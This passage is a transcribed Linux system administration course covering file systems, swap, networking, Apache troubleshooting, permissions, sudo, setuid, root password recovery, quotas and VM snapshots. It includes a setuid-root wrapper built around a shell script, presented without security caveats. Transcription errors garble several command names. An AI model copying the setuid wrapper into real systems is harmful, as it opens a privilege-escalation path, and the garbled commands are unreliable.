disk shown on the left. Currently, it's got one partition that's using the entire disk. Now, currently, it's mounted, but what I could do is click the little stop button here, which will unmount it. So it's no longer mounted. It says not mounted. And if I go into that same configuration icon and choose resize, if, for example, I want to shrink that partition, again, I would just use the slider. It adjusts the numbers, and because it's not mounted, it's going to be very easy to do this. I'll click resize, and it's done. Even visually, we get a sense of that very quickly. Now, that's great if you've got a Linux host with the GUI, but 9 times out of 10, a Linux server won't. But what I'm going to do here is switch over to a terminal window because we should have a sense of which commands we need to issue and in what order in order to manipulate the size of file systems. So as an example, the first thing I'll do is run sudo umount to unmount/dev/sdb1. Then I'll run sudo e2fsck, do a file system check of /dev/sdb1. That's got to be done first before we run commands like resize to fs of /dev/sdb1. And what I can do is I can even specify if I really want to, maybe that I want this to be 1,200 megabytes, capital M, so about 1.2 gig. Now notice it says, well, you need to run e2fscheck with the dash lowercase f first. Okay, we're going to go ahead and do that. And now when we go back to do our resize, it now shows us, measured in 4K blocks, that we've got it resized. So if, for example, I were to go back into the disk GUI tool, I could choose to select that file system and mount it. Now it's mounted at data 1, and so now if, for example, I were to look for the word folder and then just go into my GUI files browsing tool, if I go to other locations, there's data 1, and notice it's now only about 1 gigabyte in size. So we can resize file systems as needed using the GUI or using the command line. In this demonstration, we're going to focus on managing Linux swap space. So what is swap space anyhow? Because you have the same kind of concept, and we have for decades with Windows operating systems as well. So first of all, swap space is used when memory, physical memory, RAM, has been exhausted. What happens is the operating system can then take the least frequently accessed 4K memory blocks in physical memory, swap it out to disk, thus freeing physical RAM, which is thousands of times quicker than disks, for something that currently needs to be processed. So in Linux, swap space can be a file, or it could be its own entire disk partition. A lot of Linux distributions will use an entire swap partition.
And you can set this up when you are installing Linux, or you can set it up after the fact, which is the case for us here. So the first thing I'm going to do here in Linux is I'm going to run the free command, free-m. The reason I am doing this is because one of the things besides the physical memory details that are being shown here is the swap space. Notice in this particular installation, there is no swap space. Okay, so let's say that we have determined, because we've been troubleshooting performance on the host, that periodically, perhaps we might benefit from swapping things out to disk from memory, because we have peak workloads, but we don't want to install additional RAM in a physical server, let's say. Because really, if it's a virtual machine or a cloud-based VM, it might be just easier to bump up the amount of RAM. So for example, here in VMware Workstation, where I've got an Ubuntu Linux virtual machine, I could click the Edit Virtual Machines link on the left, and for memory, I could bump it up depending on what I needed. Of course, bearing in mind that that might take away memory from other virtual machines. Depending on the virtual machine solution you're using, however, dynamic memory can be configured so that virtual machines with a lot of memory that don't currently need it can make it available for other virtual machines on that same host that do. And of course, as we know, here in the cloud, in the Microsoft Azure portal, if we open up a virtual machine, we could always click on Size in the left-hand navigator and resize the virtual machine so that it includes more RAM. Now, of course, that might be okay for a single virtual machine, but that's going to add up in terms of increased cost per month if you do this for a multitude of virtual machines. Sometimes swapping, to a degree, might be a better solution. Often when I've been tasked with this, I've had to test it to see if swapping is a reasonable solution or if we just need to really just bump up the RAM itself. But let's say that we don't want to do that. So in this case, what I'm going to do now is I'm going to run sudo fdisk-l. Let's get a listing of what we've got for disk devices. Let's see, /dev/sdc 30 gig, but it's been carved up to run our Linux environment itself, but there's no swap partition or anything like that, at least not on that device. If I kind of scroll back up to our output, we also have a 7 gigabyte SDD drive, and it looks like there's nothing that's been carved out on it. That's perfect. What we're going to do is basically configure that partition of swap space. Well, we're going to make a partition on it is really what I mean. sudo fdisk/dev/sdd in our case, and I'm going to type in the letter N for new, so new partition, of course. And I'll just press enter to accept the default for a primary partition, the starting and ending sectors. I want to use the entire space. I also get a message, though, in this case that says partition number 1 contains a ext4 signature. There must have been a file system there previously. Do you want to remove the signature? We do. I'll type in the letter Y for yes. The signature will be removed by a write command. Okay, W for write, back at the command prompt. Now let's take a look at our work, though, meaning I want to run sudo fdisk-l for /dev/sdd. Okay, good. We do have our SDD1 partition, so that's stuck when we issued the W or the write command for the partition table changes. Good stuff. What I would like to do is create swap space in that newly created partition. One way we can do that is in this manner. We can run sudo make swap, which is spelled MKSWAP. All I do is point to my partition, /dev/sdd1, enter. Okay, and it knows that it's about 7 gigabytes in size. That's good. sudo swap on -v for verbose /dev/sdd1. I want to turn it on, the swap space, so it's usable right now. Okay, looks good, no errors or anything. So now what's interesting is that if we run the free command once again, but with the -m, notice now that what's showing up is that we now have swap space that will be used by our system in the form of approximately 7 gigabytes of space. In this demonstration, I'm going to focus on how to troubleshoot network configuration problems in Linux. We'll start first here in Ubuntu Desktop by taking a quick peek at how we might do that using the GUI if we have it installed in Linux. As we know, on most Linux servers, that's usually not the case. So we'll have to go through some command line tools as well that are related to taking a look at network configurations to help troubleshoot them. First of all, here in the GUI, I'm just going to click in the upper right in Ubuntu Desktop on my network icon. Here I've got a wired network connection that is currently connected. I can also click Settings here. Now this takes me into all of my settings, but I can click Network on the left. Here's my wired connection.
connected at 1000 megabits per second, no VPN setup, and I can also configure a network proxy server through which I must go through to gain access, for example, to the internet. But I'm not going to do those two things. But what I will do is click the gear or configuration icon for my wired network connection. So here we've got the details, the current assigned IP address, including IPv4 and IPv6. So for IPv6 here, we've got a link local address assigned. That's got the FE80 prefix. So if IPv6 is enabled, you always have an address starting with that prefix. If you configure an IPv6 address manually or through DHCP, you'll have an additional one shown besides the one that starts with FE80. Here's my 48-bit hexadecimal hardware or MAC address of my network card, my default router, gateway, and my DNS servers. If I click on IPv4, notice it's currently set to receive the IP settings via DHCP, Dynamic Host Configuration Protocol over the network. Of course, we could manually configure IP addresses, DNS servers, and routes as well. If I go to IPv6, I get the same types of things as well. So I can specify automatic DHCP only and whatnot. Now, if you're wondering what these shared to other computers options are for, on the Windows side, that's kind of like internet connection sharing, where on a LAN, other devices that do not have an internet connection can get one by going through your internet connection on your machine, whether you have a wired or a wireless connection that allows you to do so. So I'll click cancel, and we're going to go out to a terminal window, to the command line. Now, I happen to still be on Ubuntu desktop, but it doesn't make a difference if we are on a desktop or a server. What's important is having a knowledge of the commands. There are some basic ones that we already know, like IPA. So all of my network interfaces are shown, like my local loopback adapter, my Ethernet interface here, ENS33, along with their configurations, like the IP information for IPv4 and also for IPv6. If you've got a lot of network interfaces, like in a multi-homed server, you might be interested in just running IPA, for IP address, show dev, and in this case, I'll just focus on ENS33. So then I'm zooming into a single network interface to take a look at its configuration, which can help me troubleshoot. Of course, bringing that interface down and up is sometimes important. So if I were to run IP link set ENS33 down, it would bring the interface down. I'm not going to do that here, but I could also bring the interface up by simply changing the word down to the word up. Now, if you're doing things at the command line, it can also be important to understand that you can use a text editor like Nano, so I'll prefix that with sudo, to open up the /etc/netplan, and then you can open up a configuration file in here. Notice it's got the YAML file extension. This is where you have an option of manually configuring your network settings, for example, to use DHCP or not. For example, I could add some keywords here. For example, I could add some keywords like Ethernet's : followed on the next line by ENS33 : followed by what should be DHCP4 : no. So then I would specify specific IP addresses using the addresses keywords. And in the square brackets, for example, I could specify whatever IP it is that I want to assign here, and then specify the number of bits in the network mask. So we could configure it in this way. I'm going to get out of there, save the buffer, no. But once you've actually made the changes to the netplan file, you would put those changes into effect simply by running sudo netplan apply. And it would read the settings. Assuming there are no syntax or configuration errors, your new configuration at the network level will be put in place. Now, of course, the other thing to bear in mind is that if we're troubleshooting connectivity issues by name, we might want to try to ping. So if I ping www.google.com, we're getting a reply. So we know that DNS name resolution is working, but the reality is ping doesn't work a lot on the internet. Instead, when you're testing DNS name resolution, you should be using tools like name server lookup, NSLookup, where you would type in, for example, www.google.com, and you're going to get a non-authoritative answer, which means your local DNS server didn't actually have the record, but it went out and found it, and it returns the addresses, both for IPv4 from a DNSA record and for IPv6 via a quad A record. I'll press Q to quit. I'll type in exit to get out of there. You can also use the dig DNS tool, for example, dig www.google.com. It's a little bit different than NSLookup in that it's not interactive by default, but here we get some details back about getting an answer. Here we're getting the A record for IPv4. Notice that the dig command, depending on the version of it you're using in your distribution of Linux, which is shown up at the top here, may not report back any IPv6 information, and you might actually need that if you're troubleshooting those kinds of issues.
Let's take a few minutes to talk about what to think of when you are troubleshooting the Apache web server. The first thing we're going to do here is make sure that the Apache web server is installed. Now, there are a couple of ways of doing that, one of which is just to try to install it. It'll tell us if it's there. So let's say sudo apt install Apache 2. Well, it says Apache 2 is already the newest version. Now, if we want to make sure that's true, we can also make sure that our list of package repositories is up to date with sudo apt update. And from here, we could also choose instead to run sudo apt upgrade. So anything that we have installed that has upgrades available, we can choose to upgrade, which may or may not include, in our case, Apache. So for Python, it says there's a new version. And for Docker, I'm not going to do that, so I'll just choose no, because I'm only interested in the Apache web server. Of course, we can also check to see, since it's installed, is it running? sudo service Apache 2 status. Okay, indeed, it is active and running. If I were to do an IPA here, I have an IP address for my Ethernet interface, a private IP of 10.0.0.10. So I could run curl http://10.0.0.10. And it returns back the default HTML Apache 2 web page. All we're proving is that, yes, the default Apache web server is up and running and available, and the default, of course, is on port 80. One of the things I've had to troubleshoot is the fact that, port 80 is already in use. For example, sudo service Apache 2 stop. Let's go ahead and run sudo apt install docker.io. Let's go ahead then and run sudo apt install docker.io. I want to run a Docker containerized app that will have an HTTP web server stack. Once that's done, I'm going to run sudo docker pull, and I want to pull down from Docker Hub online a Docker container image called caddy. And I'm going to run sudo docker run -d detached, kind of in the background, and -p. I want to map port 80 in the container to port 80 on the local host, and caddy is the container image we want to run. If I run sudo docker ps, our caddy Docker containerized application is running on port 80. Therefore, we stopped the Apache web server, remember? So sudo service Apache 2 stop just to verify. We can just check the status of it. It's not running. However, if I do a curl once again of http://10.0.0.10, well, it looks like the caddy web page is now being returned. So therefore, if I run sudo service Apache 2 start, knowing that it's defaulting to port 80 as well, which is already in use, we know it's not running. So if we go ahead and start it, it failed. So we could run journal ctl-xe to read the log details, but we really know that it's because port 80 is in use. That can be hard to troubleshoot if you are just looking for another web server stack in the host OS, because it doesn't exist. It's a Docker container. So if I were to run sudo docker ps again, notice the name it assigned is called exciting_wu. sudo docker stop exciting_wu. So now if we do a docker ps, it's not running. If we try to start the Apache web server with sudo service Apache 2 start, no errors this time. If we check the status, up and running, because port 80 wasn't consumed. Now that's just a simple thing to troubleshoot, but it actually can be quite difficult to find if you're not aware that Docker might be running a containerized app with a web server. Of course, another problem can be if another technician perhaps modified the normal Apache configuration, let's say to change the port number. So if I change directory /etc/Apache 2 and do an ls, notice we've got a ports conf here. If I want to run sudo nano for ports.conf, this is where we can change the listening port from 80 to something else, or if we're using SSL, from 443 to something else. It's important to know where to check this. Naturally, you can refer to a URL over port 80 or 443 without specifying the port number. If the URL has HTTP, it's pointing to 80 by default. HTTPS 443. Otherwise, you'd have to specify it on the command line. I'll just close out of there. And if I type where is Apache 2 to get more information on the actual program files, notice the Apache 2 binary is under /usr/sbin Apache 2. If we do an ll of /usr/sbin/Apache 2, and once again, the read and write and execute permissions are set for everyone. The only user and group are set as root. I can also run ps aux, pipe that to egrep, and look for Apache or HTTPD. Why is this important? Because this will show me under which user account the Apache daemon is running. Notice we've also got a user here, www-data. So what's happening is the root account is used initially to initiate the Apache 2 web server daemon, so it can do things like bind to the appropriate port numbers. But then after that, the running of the server is handled with the www-data user account. If I were to run ps-tree, notice that we get the Apache 2 server running as root initially, and then we've got some subordinate Apache 2 daemons and items that are running under it. So if I run ps-tree -p, this becomes more apparent. Here we've got the parent Apache 2 process running as root with the parent PID, and then the subordinate PIDs. Why is that important? Because we don't want to remove, for example, the www-data user account, thinking it's not in use by anything. It's required for Apache to function properly. So these are just a few simple things to keep in mind when it comes to troubleshooting things like the Apache web server. In this demo, we're going to take a look at a few things that you might want to consider when you are troubleshooting user and file permissions issues in Linux. The first thing we'll do is talk about the user side of things to look out for. First of all, making sure the user account is not locked or disabled, which means it can't be logged into. For example, if I were to create a user, let's run sudo user add jgold. Now what we can do is also run sudo password, spelled PASSWD of course, jgold, and we can specify and confirm a password for that account. We could also have done it on the command line when we used the user add command, but I'm doing it this way. So I'll specify and confirm a password. So it says password updated successfully. Not a problem. So therefore, if we run sudo tail of /etc/shadow, then user jgold is shown here. And of course, as we know, the next field, denoted here with a full colon, is the password hash. Notice it starts with $6. If we were to run sudo password-l for lock, and then jgold, okay, it says password expiry information changed. So therefore, if we tail the shadow file again, notice that the first character is no longer just $6, but rather the first character is an exclamation mark, which invalidates the password hash. It's not going to match what the user types in. And that's fine. And we, of course, can re-enable the account or unlock it with sudo password-u for unlock, in this case, jgold. Okay, and then if we tail it, we're back in business. That's the first thing to think of. But the other thing that might cause a problem with user login on a Linux host is if we were to run sudo nano and point to /etc/security/access.conf. The access.conf file allows you to specify users or groups that should be prevented from logging into the machine, so either allowed or denied. As we go further down through this file, also notice that we've got examples that are commented out with the hashtag symbol of how you would allow access for users like root from a particular network. You can also specify IPv6 addressing as well. So entries in here could prevent users from signing in remotely over the network. And so that's an important consideration if you're troubleshooting user-based issues. Although it is rare, another consideration is if we run sudo nano against /etc and the no login file. If there is a no login file here, we can create a message such as perhaps specifying that logins are temporarily disallowed for everyone except for user root. So if this file is present, only the root account is allowed to sign in. So that might be a temporary thing you might put in place if you're performing some kind of a maintenance on a server, but it's something that we should know about when it comes to troubleshooting. On the file permissions side of things, of course, it's always important to use LL long listing for the directory you're in or whatever directory you're interested in, so that you can get a listing of the permissions as well as the owning user and the owning group. For example, I'm going to start by running sudo password root. I want to set the root password. Of course, you only need to do that if you don't already know it, and you have to be given the privilege to do this. So I'm going to go ahead and set it. Now that in itself can be an important tip. If you have users that are able to use sudo and you have a forgotten root password, you can simply log in as the user that has the sudo privileges required to run the password command and just reset the root password, assuming the system will boot in the first place. So now if I run su --dash to do a full login as user root and specify the password for that account, if I were to make a directory, let's say on the root called budgets. Now if I do an ls-ld, a long listing, but don't go into the directory, but show me the details of the directory called budgets, the root user created it and therefore is the owning user, and also the root group is the owning group, and the permissions are read, write, execute, basically for the root account, but everyone else has read and execute, which they would need to enter the directory. So let's run chmod o for other minus execute. I'm going to remove the execute permission for /budgets.
Let's do our ls-ld. Okay, notice the execute permission is gone. Now, in order for a user to change into a subdirectory, they need read and execute. Notice here, only read is present for other. Let's see what happens if we exit out as root. If I run who am I, logged in as someone else, C Blackwell, change directory to /budgets, permission denied. So therefore, if I go back in as root, and if I use the up arrow key to go back to our chmod command, but this time I change O-X to O+X, so we're going to add the execute permission back to budgets, exit out, we're back as user C Blackwell, change directory to budgets, this time it works. So if an error was set at the permissions level for a directory where only read is granted, yet the intent was to allow users into the directory, that won't work. Execute needs to be there as well. Another important thing to consider is the owning user or group. So if I've got a shell script here, let's say called test.sh, owned by user root, and the owning group is root, I want to change that so it's owned by someone else, like C Blackwell. So sudo change owner CHOWN to C Blackwell for test.sh. Clear the screen and do an LL again. For test.sh, indeed, C Blackwell is now the owning user, which means that account would have the user permissions, in this case, read, write, execute. This can be especially important if you're troubleshooting background services or daemons that need certain permissions to the file system in order to access the file system to behave correctly. In this demonstration, we're going to take a look at sudo for running elevated privileged commands, but also the special user ID bit, the SUID bit. This can be important when troubleshooting, when determining why a regular user might not be able to run more privileged commands, or why a regular user might not have the appropriate permissions to run things like a script. Let's get started here by looking briefly at sudo. When I type in who am I, it shows who I'm currently logged in as. If I'm logged in as root, then of course nothing is restricted, but we want to limit how often we log in as root for security and safety purposes. Instead, we want to ideally be logged in as a regular user here, such as C Blackwell, and then use things like sudo so we can run privileged commands. If I were to run, let's say, fdisk-l to list my disk devices and how they're carved out in terms of partitions, I just get a bunch of permission denied messages because logged in as C Blackwell, I don't have the correct permissions to go into /dev and go into these devices. However, of course, we know if we prefix it with sudo, if we are allowed to do that, not everyone can just put sudo in front of any command, but if this user C Blackwell has the ability to do that, then prefixing fdisk with sudo works. Now, of course, we can use the sudo visudo command to edit the sudoers file. This is where we could specify users, for example, that should be able to be logged in from any station and have the ability to run either all commands or a subset of commands. So for example, if we look at the root user here, the first all means from any station, from any Linux computer, any IP address, and then we are allowing all commands to be run. So of course we can modify this file and add additional users to limit what they can or cannot do. The interesting part of this as well is that if we do have a user with sudo privileges to run, for example, the password command, they could even run that against the root account to set a root password or to reset it, for example, if it gets forgotten, which happens from time to time, or if you inherit a system and you don't know the root password, but you can sign in as a user with sudo permissions. Okay, so I can update the root password in that way. Now let's take a second to talk about the special user ID bit value. First thing I'll do here is run sudo nano against a file I've already created called test.c. Now, this is a C program that includes some standard libraries, and all it's really doing is compiling the script name that I tell it. Now, we'll take a look at the script in a moment. I've got a script called test.sh that I need to run with elevated privileges of whoever the owner of the file is. Let me demonstrate this a little bit further. If I were to cat test.sh, all it's doing, it's got a shebang line clearing the screen running fdisk-l, which we know requires elevated privileges. However, if I do an ll, a long listing of test.sh, we've got the set owner or the special user ID bit set. We know this because in the owning user permission set, we have a lowercase s, which implies that the special user ID bit has been set plus execute is there. The owner here is root. Now, root can definitely run fdisk, but the user I'm logged in as, C Blackwell, cannot. So you would think if I ran /current directory test.sh, it should run as owner root. Well, technically, this is only true for binaries. See here with the script, we get a permission denied message. That's why if I go back to our little C program, what I'm doing is I'm going to compile the test.sh into a C program. We'll set the user ID bit and we'll test how it behaves. Now, you might have to run sudo apt install gcc to install a standard C compiler if you don't have one. I've already got it installed. So we can test this out on our own. So I can run sudo gcc. Test.c is my source file dash lowercase o for output. I want to create test, let's say, .bin for binary. Okay, just like that, we've now got a new file called test.bin that's a compiled binary that contains the contents of our script. Currently, the owner is C Blackwell. Let's run sudo change owner to, let's say, root for test.bin. We're on sudo change mode, chmod, to 4755. The first 4 means we want to turn on the user ID bit. The next 7 is read, write, execute. 4 plus 2 plus 1 for the owning user, root. And then 5 means read and execute for the owning group and everyone else. And of course, we want to apply that to the test.bin file. Now, here's what's interesting. I don't need to use sudo. If I run /test. Well, let's run sh again. Remember how that failed? We had a permission denied, even though it's configured to run as the owning user. Scripts just don't do that. Binaries do. /test.bin worked fine. The fdisk command ran with the permissions of the owning user. So that's something important when it comes to troubleshooting. Most Linux distributions, modern ones anyhow, will not allow the running of scripts with whoever's listed as the owning user for security reasons. You might find some older Unix or Linux systems that will do that, but that would be kind of rare in this day and age. So that's something else to think about when it comes to running elevated privileged commands. In this demonstration, we're going to talk about what you can do when you need to reset a forgotten root password. We all know that root is the super admin account on a Linux or a Unix host. It has ultimate privileges. Sometimes you need to sign in as root, even though we have other mechanisms like the sudoers file. But what can we do about a forgotten root password? Well, there are some dependencies. The first obvious one is, do you know the sign-in credentials for other users that have the appropriate sudo privileges? As an example here, I'm signed in currently as C Blackwell. Now that's in my command prompt. This can also be verified with the whoami command. Okay, so if I were to run sudo nano so we can open up and take a peek at the /etc/sudoers file. Now you should use the visudo command to edit this file, which is what it tells us on the first line. But all I'm interested in pointing out here is we've got root shown here. We've got %admin, which means the admin group, and %sudo. So whoever are members of those groups will be able to run all commands from all locations. If I were, let's say, to run sudo cat/etc/group, so the Linux group file, and let's say we pipe that to grep and look for sudo, notice that C Blackwell is a member of the sudo group. If we do the same thing for the admin group, C Blackwell's not in that group, but that's okay. So that's going to match what's in the sudoers file. So therefore, what this is telling us then, based on what we saw, is that C Blackwell would be able to run sudo password psswd against root and then set it. Now that's one option. Another option is when you boot from the installation media, as soon as you see the hardware logo on the machine or the virtual machine logo like VMware, if you have access to this, you can press and hold Shift so that you can then get into the Ubuntu, in this case, Advanced Options menu, where you can go into recovery mode. So this would allow you then to be able to reset the root password at the command line and do whatever it is that you need to do. For example, here I have the option, second from the bottom, to drop to a root shell prompt. Now for legibility, I'm going to issue the rest of the commands here in a regular SSH shell. But assuming you've entered a rescue or recovery mode on your Linux host and dropped down to a root shell, you'll be logged in directly as root, which of course we can always verify with whoami. Now what we would want to do is be assured that we can set the root password to something we know, so that we don't have to drop down into some kind of a special rescue mode in order to do stuff. We want to be able to just authenticate with the root credentials that we will then know. You always want to make sure, and you can issue the mount command to do this, that your root file system is mounted in read-write mode. So here, in this case, /dev/stc1 is mounted on the root /, and it's mounted in read-write mode. Depending on What kind of a recovery mode versus a rescue mode that you're working in will determine if that's the case. If it's not, you can just run mount-o for options, remount, and then specify your mount point, like the root file system. After that, it's business as usual. And all I mean by that is, what would you normally type in to set the password for the user you're signed in as? PASSWD. We would specify the password and then confirm it, and then you are good to go. So you will have reset the root password to something that you know. So again, you need access to the host to do this, whether it's physical or virtual. In the cloud, you might not have this kind of access to a virtual machine running in a data center somewhere. But of course, if you've got a virtual machine disk snapshot or some kind of a backup, you might be able to restore to that point in time to where you did know the root password if that situation applies. Here in the Microsoft Azure cloud, if we've got a Linux-based virtual machine that we've forgotten the credentials for, we can click on it to open up its properties. And in the left-hand navigation menu, and there are plenty of options here, but way down under Help, you will find Reset Password. You could specify the username and the password and confirm it that you want to reset it to. And that's for password-based authentication. If you're using SSH, then you can also reset the SSH public key to allow authentication. Maybe if you lost the private key file on the Linux Technician Station. So there are many options then when it comes to dealing with a forgotten root password in Linux. In this demonstration, I'll be configuring user and group file system quota limits. What we're talking about here is trying to impose some kind of a restriction on how much disk space can be used. So to get started here in Ubuntu Linux, I'm going to start with sudo apt update to make sure my package list repository listing is up to date, after which I'm going to run sudo apt install quota. It asks, are you sure you want to install it? It's going to take some disk space and whatnot. I do want it, so I'll type in the letter Y for yes. So I have the quota management tools that I need to impose these disk capacity restrictions. So I'm going to start by running quota, the command, -- version. Looks like it knows what I'm talking about. It's returning the version number. Excellent. We're ready to move on. Now, one of the first things I should think about are which file systems I want quotas enabled on and whether it's for users or groups. I'm going to run sudo nano /etc/fs tab, which has my automated mount points upon every boot up of this system, like the root file system. After the ext4 file system type, the next column are options. So what I'm going to add after that is a comma, USR quota, comma, GRP quota, user and group quotas. I want that specified as being an option when that file system is mounted. Okay, just going to go ahead and save that file. Now currently, if I run sudo mount, and if we take a look at the root file system, the mount options are shown here, but notice, of course, we don't have our user or group quota. So instead of rebooting, I'm just going to run sudo mount -o for option remount, and then I'll just put in the root file system. Let's run our mount command again. Okay, notice this time, now that we've remounted, that user quota and group quota are showing as being in effect currently. Perfect, that's what we want. The next thing I'll do is run sudo quota check -u for users, g for group, m for not wanting to remount anything in read-only mode, and I'll specify the file system here, a / for the root file system, enter. Now I'll do an ls of the root file system. Notice the presence of these files that result from our quota check command, of course, a quota.group and a quota.user. Okay, if I run sudo tail of /etc /password, we'll get a list of some user accounts. We got a user here called jgold that I want to pose some limits on. So sudo ed quota -u for user, and of course in this case I want to set it for jgold. That opens up a temporary file where we modify these quota details for given users and of course for groups as well. In this case for user jgold. So down below we have the file system, it's our root file system, and we have the option of specifying both soft and hard limits. Now, as you might guess, a hard limit is a fixed or absolute limit, where once that disk space is reached, that's it. There's no more file space that can be allocated on this file system, in this case for user jgold. A soft limit is a little bit different because they have a grace period where they'll get a warning that they are about to approach a hard limit. So maybe for a soft limit here, I'll specify 409,600, which is approximately a 4 gig soft limit, and for the hard limit, approximately 5 gigs, so 512,000 we'll put here, and I'll Control X to save that file. And I'm also going to run sudo quota on, let's say for -u for user, v verbose, maybe for the root file system, or just /home. Now, that would apply if home was its own mount point on its own disk partition, which in some cases, in some installations, it would be. In this case, it's not, and we know that because we've only got it enabled for our root file system. So now I'll run sudo rep quota-au. Notice what this is doing is sort of giving me a little report. For example, for user J Gold, we have a listing under the used column of the used number of storage blocks, and then there's our configured soft and hard limits. Now, I didn't specify a specific grace period. Remember, that applies to the soft limit that allows the soft limit to be exceeded for a period of time. That period of time is the grace limit. But in this way, we then have the option of configuring these settings to control disk consumption. I'll clear the screen. I'm going to do a tail of /etc group. I'm going to run sudo group add user group 1. If I run sudo ed quota -g, lowercase g for group, user group 1, we can then specify the same types of things, but at the group level. So cumulatively for members of the group, if we set a hard limit for blocks, for example, then that would not be able to be exceeded by the combination of space used by members of, in this case, user group 1. In this demonstration, I'll be going through how to work with virtual machine disk snapshots in the cloud. Specifically, when I say in the cloud here, I'm talking about Microsoft Azure, but the same concepts apply to other mainstream cloud platforms like Google Cloud Platform or Amazon Web Services. We want to have a way that we can revert back to an earlier point in time if we run into trouble, such as when we're testing new configurations. So the first thing I'll do here in the Azure portal is I'll click Virtual Machines. I'll then click on the virtual machine in question where I'm interested in exploring disk snapshots. When you're in the properties of a virtual machine here in Microsoft Azure, on the left, one of the things you can click on is disks. And here on the right, we'll then have the operating system disk shown. You certainly need to have at least one of those for this VM to work. And you may optionally also have some additional data virtual disks created for the virtual machine. Now, when I click on the operating system disk, which is a link, it takes me into the properties of that resource. It's a separate object in the Microsoft Azure cloud. And having the overview page selected on the left, notice at the top, I've got a create snapshot option. So create a snapshot of the OS disk. So I can go ahead and do that. Really doing here is creating another new cloud resource, another object in the cloud. You're creating a snapshot. So therefore, you have to deploy it into a resource group, which is just a collection of related cloud resources. You have to give it a name. I'm going to call this Ubuntu 2 _OS disk _snapshot. Now at this point, I can choose whether I want a full or a complete read-only copy of the OS disk, or just incremental, which uses less storage space that really only keeps a copy of the difference between this current snapshot and the last snapshot if we have another one. But I'll leave this one on full. And that's all I'm going to do here, so I'll just go ahead and click Next. It wants to encrypt it using a platform managed key. I could also have a customer managed key, but I'll just leave it on the default. I'll enable public access from all networks. That's set as an automatic option. I'm just going to keep going through here until I get to the point where the validation has passed, and I'll click the Create button in the bottom left. So it states that the deployment is in progress. Now, depending on how big the disk is and how full it is, of course, will determine how long this takes. Of course, also how busy the underlying servers in some data center somewhere for the cloud provider are. At any rate, when it's finished, I'm going to click Go to Resource, which takes me into the properties, not of the original OS disk, of course, but of the snapshot. So having this is kind of like having a backup at this point in time of that OS disk. Now, we could also go to the All Resources view from the left-hand navigator if we want to be able to find those snapshots here. For example, one of the things we could do is filter by the name of it, but we could also filter by the type. Currently, the type equals all. Well, I could scroll down in the S's and select the check mark box for snapshot and apply it, and the only thing I'm looking at now are snapshots. Now, how would we use it? So we get that it's kind of a backup, and it can be very important to do this under a variety of different circumstances, but how do you use it if you need it? You want to revert back to it. Well, one way is if you go into your virtual machine and open up its properties and go back into disks on the left. Remember how we had the link here for the OS disk and the data disks? Well, you don't want to follow the link for the OS disk this time. Instead, what you can do is choose Swap OS Disk. But when you go to the Choose Disk drop-down list, the snapshot's not there. Well, they're not supposed to be. Well, what would you do then? What's the purpose? Here's what happens. What you would do is go back to Home and create a resource. I'll type in the word managed. I would create a managed disk. So I'm creating a new disk. So this is from Microsoft, Managed Disks. I'm going to click on it, Create. when you create a managed disk, for the source type, which is set to none by default, an empty disk, instead what you could do is choose snapshot. Let's go ahead and fill this out. So I'm going to set HQ as the resource group. The disk name will be Ubuntu 2 new OS disk test for our example. And for the source snapshot, there's our Ubuntu 2 OS disk snapshot. Perfect. If I click review and create in the bottom left, it's going to validate my selection. It passed. Create. So what I'm doing is creating a new disk based on the snapshot. Then I'll be able to swap out the OS disk. That's one way that you can essentially revert back to a previous point in time created from a snapshot. Let's go back to our virtual machines view, back into Ubuntu 2, back into disks, and yes, again, back into swap OS disk, only this time it shows up in the list. That's one option. Another interesting option is, let's say I go back to my all resources. Maybe I'll filter my resources for the word test. There's our Ubuntu 2 new OS disk test. That's the managed disk that was created from the snapshot. If we open up its properties in the overview page on the right, notice we have a create VM button up at the top. That's another alternative option, depending on what your needs are, to just build a whole new VM from that disk from that point in time. So having an idea of what is available is important in your palette of options, so you can choose the best way to deal with things like reverting to an earlier point of time for a virtual OS disk. In this demonstration, we're going to focus on how to work with snapshots using an on-premises virtual machine solution. In this particular example, I've got Ubuntu Desktop running on premises within VMware Workstation. But it really doesn't matter what the solution is specifically that you're using for virtualization. Conceptually, working with VM snapshots is pretty standard. So here in my on-premises virtual machine, if I go to my menu system and go to VM settings, this is where I get a list of my virtual hardware, the amount of memory, number of processors, the disks, and we're talking here not about taking a snapshot just of the disk contents, which might be what you would do when you take a snapshot of a virtual machine disk in the cloud. We're talking about taking a snapshot, of course, of the contents of the disk files at that point in time, but also retaining the configuration of the virtual machine as we are working on here. The fact that it's got a certain amount of memory, certain number of processors, the configuration for all of this virtual hardware. And of course, if the virtual machine is up and running as this one is, it will also retain the state of what's happening in memory, so that when you bring the snapshot back, you are exactly where you were when you took or created the snapshot. So here in VMware Workstation, I can go to VM, I can then choose Snapshot, I can take individual snapshot, I can also go to the Snapshot Manager to get kind of an idea of where I am in my history of snapshots. This virtual machine doesn't have any, so the only thing I have here is you are here. And from here, I can choose to take a snapshot. It wants a name. Maybe I'm about to test a configuration for app 1. So before app 1 config, I can put in details such as the date, maybe specify a detailed description of what this contains, and any configuration settings within this specific snapshot. So you put in whatever makes sense for you. And you want to be consistent when you do this, because over time, if you use a lot of virtual machines and you take periodic snapshots, or if they're configured to be taken automatically, you might end up with a lot of snapshots. You want to make sure each of them is clear in terms of what it was taken for and what kind of configuration exists within it. Okay, now I'll click Take Snapshot. Now bear in mind that in most virtual machine solutions, when you create additional snapshots, all you're doing is picking up the changes from the previous one. Now, if I kind of get out of my full screen mode under the view menu here, notice in the bottom left here in VMware Workstation, it's telling me it's saving the state, and we're currently at about 17%. So as you might imagine, the first time you take a snapshot is the longest time it will usually take for this task to complete. Once the snapshot is complete, you can continue using the virtual machine, and rest assured you've got a copy or a snapshot that you could revert to. Let's go back into the VM menu here, back into Snapshot Manager. So if I select my snapshot, when I do, down at the bottom, I get the name that shows up, plus all of the description metadata, which can be very important, of course. And we can take additional snapshots at any point in time. So if I call this just snapshot 2, take snapshot, and close out, we now see it's saving the state. It should be quicker than the initial snapshot, as not much has changed. Let's go back into VM Snapshot and Snapshot Manager yet again. Now notice now that we have a couple of snapshots, we have revert options that are new menu items that show up here. Notice that we also have an auto protect button here. where we can specify a frequency where we want snapshots taken automatically, whether it's daily, half-hourly, hourly, and you can determine the maximum number of auto-protect snapshots. When you do enable that, I'll just cancel out of here, you can then choose Show Auto-Protect Snapshots, as you might guess, and they'll show up here, and you can select it and even choose to revert to it. So for example, if I were to go back and just select another snapshot, I could choose the Go To button to revert to it. Notice here we also have a clone option. Now, cloning is a little bit different because you are essentially taking a copy of the VM. Now, here it says we can't do this because the virtual machine is up and running. You can take a snapshot of a running VM, but not a clone. So if you know you just want to have 